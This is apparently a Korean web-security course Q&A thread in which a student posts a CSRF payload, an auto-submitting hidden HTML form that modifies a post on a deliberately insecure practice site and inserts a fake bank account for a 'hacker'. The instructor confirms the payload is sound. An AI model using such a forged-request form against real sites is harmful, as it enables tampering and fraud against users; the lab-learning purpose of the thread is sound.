-
질문 & 답변
카테고리
-
세부 분야
보안
-
해결 여부
해결됨
무단 수정에서
20.07.28 17:46 작성 조회수 151
1
<body onload="document.forms[0].submit()"><o:p></o:p>
<form action="http://아이피/insecure_website/action.php" method="POST" enctype="multipart/form-data"><o:p></o:p>
<input type="hidden" name="title" value="계좌번호 정보입니다."><o:p></o:p>
<input type="hidden" name="content" value="* 은행 : 와우 은행
* 예금주 : 해커
* 계좌번호 : 1111-1111-2222"><o:p></o:p>
<input type="hidden" name="password" value="a"><o:p></o:p>
<input type="hidden" name="idx" value="43"><o:p></o:p>
<input type="hidden" name="mode" value="modify"><o:p></o:p>
<input type="submit"><o:p></o:p>
</form><o:p></o:p>
</body><o:p></o:p>
했는데 계속 잘못된 요청이라고 뜨는데 혹시 작성이 잘못된 걸까요..?
답변을 작성해보세요.
1
뭐라고그게
질문자2020.07.29
해결 하였습니다 저도 vm을 사용해서 똑같이 실습하는데
vm에 있는 코드를 사용자 쪽에 넣어보니깐 다 정상적으로 작동하네요 아마 코드의 문제 였던 것 같습니다.
감사합니다.
1
크리핵티브
지식공유자2020.07.28
음...
공격 페이로드 자체는 문제가 없는데,
잘못된 요청이라고 출력되는게 경고창으로 출력이 되나요???
혹시 스크린샷 첨부 가능할까요?
그리고 저 스크립트를 게시하고 읽을 때 스크립트가 동작하는지 확인도 부탁드리겠습니다.
정확한 상황을 몰라서 체크를 해봐야할 듯 하네요.
0
답변 3